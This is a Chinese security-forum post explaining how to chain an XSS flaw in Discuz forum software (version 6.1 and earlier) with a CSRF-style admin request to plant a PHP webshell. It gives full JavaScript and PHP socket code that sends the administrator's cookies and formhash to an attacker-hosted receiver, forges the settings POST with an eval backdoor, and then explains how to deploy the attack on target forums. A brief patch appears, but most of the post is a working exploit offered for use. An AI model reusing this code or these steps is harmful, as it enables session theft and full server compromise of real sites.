找回密码
 立即注册
查看: 4212|回复: 0
打印 上一主题 下一主题

Discuz XSS得webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:11:49 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Discuz XSS得webshell7 Q. \0 Z' `3 V1 V  W) Z
By racle @tian6.com
$ |( @) r8 g& Q2 y$ u; Y% O% L欢迎转帖.但请保留版权信息.0 M; P; Z2 x5 `+ L0 b
受影响版本iscuz<=6.1.0,gbk+utf+big5
& g' ]5 }; t( P$ x9 d' t( Z2 R& P5 q5 Z, b  O: N% @
新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.5 r1 |. H& N* p% u6 y( v5 ]

& `  ?9 s& B( M6 R1 X6 j7 R( g' X1 ]& |5 h
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=87063 [, S+ D$ F) m+ ^+ T
当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.$ t. i+ \9 Y# |; A$ c# D" P
2 p5 Z- Z, `1 w, r) U6 [
分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
" D! [+ N5 n5 s( q/ ^* E' r; g$ d: H/ j本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS  R. q3 d8 f/ ^9 _3 N" @
+ x! x+ o6 G# k8 D; o3 O2 z

. j: F* b5 P& A8 K; K----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------* z+ b2 |' ]9 Z3 z4 {

2 X3 v/ w! \4 _: k( x/ T* K6 X: X5 L' F% m
problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.
/ Z5 U* B+ k4 C4 E5 l3 S% P' n* {1 w+ u. z$ \
problem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.# Q) u& m/ D8 F" s6 @- \% [

4 ^. z/ d. Y! R, v) f, kproblem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
' ?: A7 u( S& T* k. O# i4 ^: f, L/ O; O( V& U

: l3 h( g: Y0 |. C' A( }下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {4 z( M& f0 V4 [+ R% I( Z2 d
+ ~' b* I7 _" t: O. ^7 G
        global $runwizardfile, $runwizardhistory;
6 |$ G! ^1 C3 v+ ?, E7 _3 o8 p+ F# }0 u5 N2 D3 q2 V
        $fp = fopen($runwizardfile, 'w');
6 V5 d$ Y1 g2 u1 C$ j2 m% c5 Z0 @
        fwrite($fp, serialize($runwizardhistory));
, a5 N2 q2 `% ]% m
2 `  ?7 @# Z8 e3 L5 F5 Y        fclose($fp);) e2 }& p2 w2 H

/ h2 J  O: Z) l" @; Z7 o  ~}' j8 C$ ~# F. m0 T8 {$ H3 H
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.
5 Z" S/ f; X( [0 l! O$ K; m, Y% c3 d以下是修补的办法:function saverunwizardhistory() {. k: u- J- o  A: r+ @1 P
+ [& s/ l6 L# s2 n
        global $runwizardfile, $runwizardhistory;
# Q9 [. {  C/ p! w/ M
% b- L9 T; f, E" }3 Y        $fp = fopen($runwizardfile, 'w');
" W3 B, }! _+ W% t. j
4 f. k( d0 U$ R* V2 C0 i+ ^        $s = '<?php exit;?>';
! U6 U6 D: S3 a# J& H6 o% @) Y+ m$ t$ M9 ?9 g/ P
        $s .= serialize($runwizardhistory);
6 t0 q/ i4 b* y
% [: g. k7 k3 C% p/ {        fwrite($fp, $s);" D; |2 m. ]/ Y# Q: n8 E3 J7 j
, J+ G$ k2 ~; ^# c1 P
        fclose($fp);& E4 }% ~" ^6 V/ c1 g, Z: J5 h+ C# d
- D* M; W& }% {2 Q# F. P$ z
}
! s5 M4 \* w, ~. U! k复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
! U0 C  Z, {4 [2 E; G' q# M2 Q* y4 r( `9 e. d

0 X' `9 }2 P0 b6 X
- k% j9 B2 s6 ~1 i* [! {----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------
% T1 r& n, E$ c' j' Y' A$ D% z& q- \' w7 _4 Z4 T' ]$ A
! T8 g- ?1 _6 J+ j# P: b2 E; p5 ?
  以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.. l. ^* E" O8 g# ~" E% C
/ L& N* M+ q5 j9 y" |
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
& H% m5 b1 D' f0 F! i$ t
9 M7 ^; _7 w5 n+ o这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.% j% Z8 s5 ~+ b! A2 Y! B/ @4 {
$ h6 _" H' T2 J  }
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:+ y5 P6 I. `% {" \, P7 }* L4 E5 H

( }  m, S/ Q: c$ A  `1 J" S) Gvar url="http://目标网站/admincp.php";      3 b/ H; `2 N& P3 ?7 m9 f4 X
- L' e% w8 R% G; d' }% k
/*获得cookies*/8 {, n  N) {! ~+ g. ?; X

- t! p# n" ]9 Q5 C: J/ o3 dfunction getURL(s) {6 W. H0 Y! y- p5 j
# H) v; P( Z9 A+ i. `  S; x
var image = new Image();: E  Y! Y: }* V4 Z! i
6 f8 n7 o& o7 E/ A# J6 ]
image.style.width = 0;
' G0 y5 w. F8 c* [* \
! }. U. m9 i" r  {4 m/ \image.style.height = 0;9 g6 W; h' E# f5 ?3 b& j, q
  m5 K2 o( P8 i5 n+ }4 S* ?- l
image.src = s;7 p: I2 Q: l4 \8 ?7 f

0 B; W" L: {9 w' B2 i" G: o1 k; u. u! L}
" t0 L. u) ?% B$ L; V; ]
7 `: L! B, c0 U' U; WgetURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie));  //这里就通过image变量传给了php
8 l4 U( @" J2 B3 U复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];: j4 }# I# X2 a8 x- B6 d2 D" U
复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵)
7 }1 P/ q+ Y+ B# ^8 U
) L# ^; `* K. Y3 h, [- f8 E: r8 b# m' U+ t/ f" d6 m) O
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";
! r- |/ p8 ^6 l! S; Y; f3 U" q% u" `6 B4 E

: x3 p. G5 I) J. T# t
% F/ K: t$ j+ K$ q/*hash*/" F9 I" z" y7 }" N. P
0 q6 ]' o# o8 F* M0 P
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");# Q7 I$ K$ O% w+ l: C
6 }* l; c5 ~6 k  t5 ~3 i6 b
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);
8 ]" n; m6 \. O, J! y
9 _/ `1 w/ H5 m, dxmlHttpReq.send();' n% f" O6 X. X+ j' q7 Q" r

7 N! G, n4 t, p. ^. a& bvar resource = xmlHttpReq.responseText;
9 I5 O% }6 |8 q
) W& Z8 I/ m3 g) I/ Pvar numero = resource.search(/formhash/);% s' j) U  B4 {: P
' E  [/ G# X' y5 `
var formhash=encodeURIComponent(resource.substr(numero+17,8));
7 M, O5 ]1 @. V- f% F
  k3 A- S/ j# i$ K( x: @* s
- Q% k) w( Z) ~( \; m. J. r
/ _0 Z0 ], f7 l2 K5 Vvar post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据 : w4 f0 P" Q- U5 N, b6 O
3 p6 B' C) d- S" E; l
xmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信 3 [2 }0 R# g  B

2 N8 n9 m) f- \% y. }& s5 ^, |* t5 R% vxmlHttpReq.setRequestHeader("Referer", url);  ?/ Q5 n/ o$ q0 G3 j9 K/ H
. A, Z$ g* n2 y8 o
xmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");. h: X% f. s, g% c8 s$ X/ S

; q! E4 X' K  m5 DxmlHttpReq.setrequestheader("content-length",post.length);
! c& f9 d6 {) w2 A( o
4 A/ R1 V$ A0 f8 J6 ]/ }1 ^xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
6 L) G5 Q$ A, [- w' ?' D6 u
! Y; O1 ?# U7 Y9 Y: n( QxmlHttpReq.send(post);//发送数据
+ U! c, w) N# E  _  a) r复制代码这里HASH我假设正确,这样提交,也无须cookies; A8 R& ~: E# y5 S# p! T

9 P3 U, X0 ?, m& r! _# \再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
/ g1 t- x; Y+ `' Q9 T8 a5 k) S' j/ V
if (!$sock) die("$errstr ($errno)\n");
  {/ V9 W' a* \1 c. p9 G/ j" z; A+ Q) `7 W8 o' D) W/ q$ F
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';9 t  @5 `  S% c
( m) b9 Q3 E- e6 Y" f& t) W% W- |

1 @# K, @- [, K
+ K# g0 W9 D9 B) P& X: b- z5 rfwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");# k: z# o2 I1 C$ ^3 V. p
. s4 J& }5 I# r( t  z* M7 V
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");
; a/ [  d, _. ^8 J0 H& A: `! M+ Z: C6 p* x' |3 T) v1 \
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
; B6 J" O2 K' y6 U5 i+ O) @3 _6 s2 I+ e
fwrite($sock, "Accept-Language: zh-cn\r\n");. G8 ]; X5 Y) M: z0 p
) @$ V, o  Z: f' r) z
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");, v, a! I: p+ M4 Y- g, C
! H8 D/ k1 u3 ^* X2 h* W/ ^6 h
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
0 F5 e; c" i8 V! K1 S+ _! i
" B' s4 E% `+ g* Y  |; G1 f. tfwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");& t, n. u, Z6 [  g

+ V" i0 N% @1 q  l. i4 x$ Wfwrite($sock, "Host: $url\r\n");
3 Y) @+ w$ G0 p3 S4 i7 R! y
" r: A4 W" g1 Z; T6 E* y. s3 qfwrite($sock, "Content-Length: ".strlen($data)."\r\n");/ r" K+ E9 s4 v+ s4 V) G9 @6 Y+ f

. I. |/ P2 W: r7 s5 R4 zfwrite($sock, "Connection: Keep-Alive\r\n");2 F: s8 w! k1 |) Z

5 p! X" ?: r4 h. r" \fwrite($sock, "Cache-Control: no-cache\r\n");
, m$ [6 z1 T2 {" [
- t8 F) N4 c# Bfwrite($sock, "Cookie:".$cookies."\r\n\r\n");
/ H8 ^; C8 v) T* R) l; a: D
4 {4 ^" }# ~+ K" H/ q3 Rfwrite($sock, $data);+ P1 r& P, R8 y
+ V- l/ Q6 x9 F" F  H( n- M% s

' l' e7 c, C' Y  o- |7 k" l/ m2 O! h5 c/ b9 @3 v9 B
$headers = "";. i: [7 z- Q# a) P$ \6 s# v
( v3 Z, ^: {, f. R! r! s, X
while ($str = trim(fgets($sock, 4096)))
4 X/ j$ t: p. D9 o; C' ]0 B! ?/ ]  m" s4 ?/ }0 B/ O
     $headers .= "$str\n";3 ~- K5 R) a0 S

3 |6 b* Z5 g$ I1 Recho "\n";1 K4 @* s/ d  I

5 R8 x+ g& d- B9 O! ~  _$body = "";) X6 f2 C) R' s. M% g1 m! S
( A- q: ^9 s7 J/ Y
while (!feof($sock)). C  F0 o0 X6 c0 f  U% p
/ B1 W  v! w' X0 \$ a$ R! ^
     $body .= fgets($sock, 4096);% R- s3 F" f: F2 ?

+ L3 C1 X8 z* y$ I* f2 Kfclose($sock);* I+ v7 u2 `$ |  R( D' K* i

% h6 W/ S0 a1 ?( Qecho $body;
. ?1 P  F2 L& m8 Z' @复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^* w* g* I3 v. P" L0 A
& t  D0 w: f" |0 y0 F, B6 \
+ {" z1 Y  r1 A4 S* y. P3 E
-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
% [/ Q. |$ T. W* v2 _
$ h8 F  b9 d8 i" z: h9 l  \- @$ b7 h# d7 N( y
1HP SOCKET利用方法首先打开racle.js
- D+ W) E4 p3 t3 U
( h5 L5 ]7 I4 c5 Q: q& o: xvar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home# r1 g+ j* e& Y2 }7 c1 N
: k6 t1 }1 N1 ~6 l/ m
, y% ^- F9 c2 t# D, U8 p* V
3 m$ j2 ~$ t) \7 v
然后打开racle@tian6.php
9 z: Q1 k/ z5 R4 i7 t$ q) M( [' J9 w: n/ R  @
$url="racle@tian6.com";   //改成你要XSS攻击的目标,譬如www.discuz.com3 t+ O: {/ o6 C
: ?' c8 K/ W& I& t2 ~+ E  |& `% L

# `3 A6 t5 I. r/ t& l9 W6 p
4 U: `+ L$ Y7 m如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
7 {: Q7 l! P2 X0 L3 |+ f  Z6 |" b8 W. C
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));
- y3 i  J# h: e( `% B% C" T2 x+ P$ t, }1 E& `: g
; j) D+ D$ a( m' ?& [# d# i
3 s  y" X2 w8 R: V3 r/ _
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
" C" e) I( ?1 [) Z8 G3 A' Y0 L/ J复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
9 f$ r5 W, T2 o3 ~( a. |2 S. x/ M7 v7 w: e

) F9 K* \$ Q% ^+ t& c
" U2 Q5 p  n, P' Y* o* `如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
8 x, {/ ~! M) e
+ q6 y* R* Z% l6 yvar formhash=encodeURIComponent(resource.substr(numero+17,8));
$ G) V# g- s( H$ x6 Y% V& c4 a$ C8 s
4 j/ e! }- T1 _7 H8 v

+ g* ?/ }! N( w' t- |3 L8 s4 Pvar formhash=encodeURIComponent(resource.substr(numero+9,8));
2 r! W1 m+ T% f. B5 V0 t0 G0 o; o! h) H复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.- w) G0 ^0 ?4 b, s

; J+ Q& Q: K" i! J4 F0 s如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.5 H1 b7 b* P  o% ^) D1 q7 v

% U- w$ e1 C) Z# M: }如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.
- E" m2 D2 @5 y, p9 f2 D+ c- L% o+ k" G
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
! O  K" W% k3 L4 B7 e
. _9 ^: D) K6 y+ v+ g: Y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表